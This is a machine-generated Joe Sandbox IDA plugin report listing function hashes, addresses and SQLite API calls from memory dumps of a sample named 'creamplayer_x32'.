                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_bind_int64$sqlite3_freesqlite3_resetsqlite3_step$sqlite3_column_int64sqlite3_mallocsqlite3_realloc$sqlite3_column_intsqlite3_initializesqlite3_mprintfsqlite3_mutex_leavesqlite3_prepare_v2
                                                                                                    • String ID:
                                                                                                    • API String ID: 961572588-0
                                                                                                    • Opcode ID: c724daf3936d67fd3e7a59374d144345718a9f8d9c21f3c7abba70c9fa35c0f4
                                                                                                    • Instruction ID: dba6eef834311e7f80380fc62c490a647dd1765b4da9a7e0a506f520bf28697a
                                                                                                    • Opcode Fuzzy Hash: c724daf3936d67fd3e7a59374d144345718a9f8d9c21f3c7abba70c9fa35c0f4
                                                                                                    • Instruction Fuzzy Hash: 9872F275A042298FDB24CF69C88078DB7F6FF98314F1586A9D889AB341D774AD81CF81
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_bind_int64sqlite3_mutex_leavesqlite3_stricmp
                                                                                                    • String ID: 2$foreign key$indexed
                                                                                                    • API String ID: 4126863092-702264400
                                                                                                    • Opcode ID: efb0247afb620838301bdf32ec29a55ffab8ab84c5461d6934eb6e15b590f11f
                                                                                                    • Instruction ID: 3d5d194cd292e354de8359ea213fef7e5121ae3f60f7d2d7ba557b44893e8b9c
                                                                                                    • Opcode Fuzzy Hash: efb0247afb620838301bdf32ec29a55ffab8ab84c5461d6934eb6e15b590f11f
                                                                                                    • Instruction Fuzzy Hash: 6BE1B374A142099FDB04CFA8D590A9DBBF2BFA9304F21C129E855AB754DB35ED82CF40
                                                                                                    APIs
                                                                                                    • sqlite3_bind_int64.SQLITE3 ref: 6094A72B
                                                                                                    • sqlite3_step.SQLITE3 ref: 6094A73C
                                                                                                    • sqlite3_column_blob.SQLITE3 ref: 6094A760
                                                                                                    • sqlite3_column_bytes.SQLITE3 ref: 6094A77C
                                                                                                    • sqlite3_malloc.SQLITE3 ref: 6094A793
                                                                                                    • sqlite3_reset.SQLITE3 ref: 6094A7F2
                                                                                                    • sqlite3_free.SQLITE3(?), ref: 6094A87C
                                                                                                      • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_bind_int64sqlite3_column_blobsqlite3_column_bytessqlite3_freesqlite3_mallocsqlite3_mutex_entersqlite3_resetsqlite3_step
                                                                                                    • String ID:
                                                                                                    • API String ID: 2794791986-0
                                                                                                    • Opcode ID: 324244e72ed1eb068e97444324dd06558e7f5640642cd65f7376e38a8826fd77
                                                                                                    • Instruction ID: 088d5e00ded46b3eb5457b54e5d33bc48436a4b712d77f6ae5dc1ca3eb859b7b
                                                                                                    • Opcode Fuzzy Hash: 324244e72ed1eb068e97444324dd06558e7f5640642cd65f7376e38a8826fd77
                                                                                                    • Instruction Fuzzy Hash: BE5110B5A042058FCB04CF69C48069ABBF6FF68318F158569E858AB345D734EC82CF90
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_stricmp
                                                                                                    • String ID: USING COVERING INDEX $DISTINCT$ORDER BY
                                                                                                    • API String ID: 912767213-1308749736
                                                                                                    • Opcode ID: 5e6ae8a77223c4cf3853263767bd84c2ef0a0cb2633a4755bdfaa367f33b2fd5
                                                                                                    • Instruction ID: 4f43644a9add5c5df618cbd47cd61ce2203d262f2077f605e752fe25420d36ab
                                                                                                    • Opcode Fuzzy Hash: 5e6ae8a77223c4cf3853263767bd84c2ef0a0cb2633a4755bdfaa367f33b2fd5
                                                                                                    • Instruction Fuzzy Hash: 2412D674A08268CFDB25DF28C880B5AB7B3AFA9314F1085E9E8899B355D774DD81CF41
                                                                                                    APIs
                                                                                                    • sqlite3_bind_int64.SQLITE3 ref: 6094B488
                                                                                                    • sqlite3_step.SQLITE3 ref: 6094B496
                                                                                                    • sqlite3_reset.SQLITE3 ref: 6094B4A4
                                                                                                    • sqlite3_bind_int64.SQLITE3 ref: 6094B4D2
                                                                                                    • sqlite3_step.SQLITE3 ref: 6094B4E0
                                                                                                    • sqlite3_reset.SQLITE3 ref: 6094B4EE
                                                                                                      • Part of subcall function 6094B54C: memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,6094B44B), ref: 6094B6B5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_bind_int64sqlite3_resetsqlite3_step$memmove
                                                                                                    • String ID:
                                                                                                    • API String ID: 4082478743-0
                                                                                                    • Opcode ID: aa77e302053f557c70a8d8c80c1bb3ccc0b69d7e46be98bddd9db9cb48891f7f
                                                                                                    • Instruction ID: 9e7f29540a3c6f2d28ce6b101cd1a975f5529a8f599b89b7128c34d749e8d9ce
                                                                                                    • Opcode Fuzzy Hash: aa77e302053f557c70a8d8c80c1bb3ccc0b69d7e46be98bddd9db9cb48891f7f
                                                                                                    • Instruction Fuzzy Hash: DD41D2B4A087018FCB50DF69C484A9EB7F6EFA8364F158929EC99CB315E734E8418F51
                                                                                                    APIs
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 6094D354
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 6094D546
                                                                                                      • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905D8B
                                                                                                      • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905DA4
                                                                                                      • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905DB8
                                                                                                    • sqlite3_stricmp.SQLITE3 ref: 6094D3DA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_stricmp$sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                    • String ID: BINARY$INTEGER
                                                                                                    • API String ID: 317512412-1676293250
                                                                                                    • Opcode ID: a7efc97792d1e6a4bc5cda92ab6d03f9066f32250883ff14ac0274f07e3e06bf
                                                                                                    • Instruction ID: cace79839434994537c0410bddb438ad3d501bddbf1b20fcc6a8a8bdb5da7fdd
                                                                                                    • Opcode Fuzzy Hash: a7efc97792d1e6a4bc5cda92ab6d03f9066f32250883ff14ac0274f07e3e06bf
                                                                                                    • Instruction Fuzzy Hash: 8E712978A056099BDB05CF69C49079EBBF2BFA8308F11C529EC55AB3A4D734E941CF80
                                                                                                    APIs
                                                                                                    • sqlite3_bind_int64.SQLITE3 ref: 6094B582
                                                                                                    • sqlite3_step.SQLITE3 ref: 6094B590
                                                                                                    • sqlite3_column_int64.SQLITE3 ref: 6094B5AD
                                                                                                    • sqlite3_reset.SQLITE3 ref: 6094B5EE
                                                                                                    • memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,6094B44B), ref: 6094B6B5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memmovesqlite3_bind_int64sqlite3_column_int64sqlite3_resetsqlite3_step
                                                                                                    • String ID:
                                                                                                    • API String ID: 2802900177-0
                                                                                                    • Opcode ID: f7dd783d858009ac2aa36dfb06bc3a4e86bc75c1920f7d1bf53ec4d0fe99899e
                                                                                                    • Instruction ID: fa681a173a9aa7ad5377a8f3376375fc0286f70c891b696e42c92f52458a3a0e
                                                                                                    • Opcode Fuzzy Hash: f7dd783d858009ac2aa36dfb06bc3a4e86bc75c1920f7d1bf53ec4d0fe99899e
                                                                                                    • Instruction Fuzzy Hash: 0B517D75A082018FCB14CF69C48169EF7F7FBA8314F25C669D8499B318EA74EC81CB81
                                                                                                    APIs
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 6093F443
                                                                                                      • Part of subcall function 60904396: sqlite3_mutex_try.SQLITE3(?,?,?,60908235), ref: 609043B8
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 6093F45C
                                                                                                      • Part of subcall function 60939559: memcmp.MSVCRT ref: 60939694
                                                                                                      • Part of subcall function 60939559: memcmp.MSVCRT ref: 609396CA
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 6093F8CD
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 6093F8E3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcmpsqlite3_mutex_entersqlite3_mutex_leave$sqlite3_mutex_try
                                                                                                    • String ID:
                                                                                                    • API String ID: 4038589952-0
                                                                                                    • Opcode ID: 29e5932b9866e1e5e2fcd92ac707fe98724786dada8c9b11deae4621e05e1fb7
                                                                                                    • Instruction ID: 916146ddc5613ce70bfe97dc7fabc38680eb49f4f4fdba01105907ea2da9c682
                                                                                                    • Opcode Fuzzy Hash: 29e5932b9866e1e5e2fcd92ac707fe98724786dada8c9b11deae4621e05e1fb7
                                                                                                    • Instruction Fuzzy Hash: 87F13674A046158FDB18CFA9C590A9EB7F7AFA8308F248429E846AB355D774EC42CF40
                                                                                                    APIs
                                                                                                      • Part of subcall function 6094A894: sqlite3_bind_int64.SQLITE3 ref: 6094A8C0
                                                                                                      • Part of subcall function 6094A894: sqlite3_step.SQLITE3 ref: 6094A8CE
                                                                                                      • Part of subcall function 6094A894: sqlite3_column_int64.SQLITE3 ref: 6094A8E9
                                                                                                      • Part of subcall function 6094A894: sqlite3_reset.SQLITE3 ref: 6094A90F
                                                                                                    • sqlite3_bind_int64.SQLITE3 ref: 6094C719
                                                                                                    • sqlite3_step.SQLITE3 ref: 6094C72A
                                                                                                    • sqlite3_reset.SQLITE3 ref: 6094C73B
                                                                                                      • Part of subcall function 6094B54C: memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,6094B44B), ref: 6094B6B5
                                                                                                      • Part of subcall function 6094A9F5: sqlite3_free.SQLITE3 ref: 6094AA7A
                                                                                                    • sqlite3_free.SQLITE3 ref: 6094C881
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_bind_int64sqlite3_freesqlite3_resetsqlite3_step$memmovesqlite3_column_int64
                                                                                                    • String ID:
                                                                                                    • API String ID: 3487101843-0
                                                                                                    • Opcode ID: 5f7c6ccdcb237f7a487fb09799aacf08d073da1bf61c53431d7ccff799043987
                                                                                                    • Instruction ID: dadb85a3919e548a164012fc2e04d9b0ab11445217433cc10b515e99a95ed5c3
                                                                                                    • Opcode Fuzzy Hash: 5f7c6ccdcb237f7a487fb09799aacf08d073da1bf61c53431d7ccff799043987
                                                                                                    • Instruction Fuzzy Hash: 3681FA74A046098FCB44DF99C480A9DF7F7AFA8354F258529E855AB314EB34EC46CF90
                                                                                                    APIs
                                                                                                      • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                                      • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                                      • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                                                    • sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                                                                      • Part of subcall function 609256E5: sqlite3_bind_int64.SQLITE3 ref: 60925704
                                                                                                    • sqlite3_column_int.SQLITE3 ref: 6096A3F3
                                                                                                    • sqlite3_step.SQLITE3 ref: 6096A435
                                                                                                    • sqlite3_reset.SQLITE3 ref: 6096A445
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_bind_intsqlite3_bind_int64sqlite3_column_intsqlite3_freesqlite3_mprintfsqlite3_prepare_v2sqlite3_resetsqlite3_step
                                                                                                    • String ID:
                                                                                                    • API String ID: 247099642-0
                                                                                                    • Opcode ID: 64427881e425bd4a7d2fa305579facb0dd1ab8a71ce9f1271cd8f49c57a97bec
                                                                                                    • Instruction ID: 69535c0605dcb565d56369453fd68d3a3097adfd173720c6e67b3d4aca8354ad
                                                                                                    • Opcode Fuzzy Hash: 64427881e425bd4a7d2fa305579facb0dd1ab8a71ce9f1271cd8f49c57a97bec
                                                                                                    • Instruction Fuzzy Hash: FF2151B0A143148BEB109FA9D88479EB7FAEF64308F00852DE89597350EBB8D845CF51
                                                                                                    APIs
                                                                                                      • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                                      • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                                      • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                                                    • sqlite3_bind_int64.SQLITE3 ref: 6096A322
                                                                                                      • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                                    • sqlite3_step.SQLITE3 ref: 6096A32D
                                                                                                    • sqlite3_column_int.SQLITE3 ref: 6096A347
                                                                                                      • Part of subcall function 6091D4F4: sqlite3_value_int.SQLITE3 ref: 6091D50C
                                                                                                    • sqlite3_reset.SQLITE3 ref: 6096A354
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_bind_int64sqlite3_column_intsqlite3_freesqlite3_mprintfsqlite3_mutex_leavesqlite3_prepare_v2sqlite3_resetsqlite3_stepsqlite3_value_int
                                                                                                    • String ID:
                                                                                                    • API String ID: 326482775-0
                                                                                                    • Opcode ID: de94f0bba3b8b54078f1ceecce583a965f8e010bb36370f6070bcd8bc28ee8b0
                                                                                                    • Instruction ID: 7c1586c82cd56d85cf32929a5cd575737867df940847ca2bf63216634e784e33
                                                                                                    • Opcode Fuzzy Hash: de94f0bba3b8b54078f1ceecce583a965f8e010bb36370f6070bcd8bc28ee8b0
                                                                                                    • Instruction Fuzzy Hash: 0E214DB0A043049BDB04DFA9C480B9EF7FAEFA8354F04C429E8959B340E778D8418B51
                                                                                                    APIs
                                                                                                    • sqlite3_bind_int64.SQLITE3 ref: 6094B71E
                                                                                                      • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                                    • sqlite3_bind_int64.SQLITE3 ref: 6094B73C
                                                                                                    • sqlite3_step.SQLITE3 ref: 6094B74A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_bind_int64$sqlite3_mutex_leavesqlite3_step
                                                                                                    • String ID:
                                                                                                    • API String ID: 3305529457-0
                                                                                                    • Opcode ID: dc92f9052f14c19b23696c87723feab2593fd922d888b89f432a916288e70c30
                                                                                                    • Instruction ID: cea3564161c85327b61b62d60446574847d05a2bcfebeda4641ea5396b37aa5a
                                                                                                    • Opcode Fuzzy Hash: dc92f9052f14c19b23696c87723feab2593fd922d888b89f432a916288e70c30
                                                                                                    • Instruction Fuzzy Hash: D401A8B45047049FCB00DF19D9C968ABBE5FF98354F158869FC888B305D374E8548BA6
                                                                                                    APIs
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 6090C1EA
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 6090C22F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                    • String ID:
                                                                                                    • API String ID: 1477753154-0
                                                                                                    • Opcode ID: 8c595cf50166d2d57a1b46d7a61a8743a20f226779b5cb212a2500e19f50b056
                                                                                                    • Instruction ID: fc120f7ed3300d8301d0f99cb769197b575d5683181bd6b289e4b53452841bc5
                                                                                                    • Opcode Fuzzy Hash: 8c595cf50166d2d57a1b46d7a61a8743a20f226779b5cb212a2500e19f50b056
                                                                                                    • Instruction Fuzzy Hash: 6501F4715042548BDB449F2EC4C576EBBEAEF65318F048469DD419B326D374D882CBA1
                                                                                                    APIs
                                                                                                      • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 609255B2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                                    • String ID:
                                                                                                    • API String ID: 1465156292-0
                                                                                                    • Opcode ID: 61f2b65abbb078f396bfa931b2809e4962fa985140118a0fa907d432528e7d54
                                                                                                    • Instruction ID: 19c4c58ecb434a21204d9b38047e93a23a7f28015e8477a734fda6841bb58fe8
                                                                                                    • Opcode Fuzzy Hash: 61f2b65abbb078f396bfa931b2809e4962fa985140118a0fa907d432528e7d54
                                                                                                    • Instruction Fuzzy Hash: 56317AB4A082188FCB04DF69D880A8EBBF6FF99314F008559FC5897348D734D940CBA5
                                                                                                    APIs
                                                                                                      • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 60925508
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
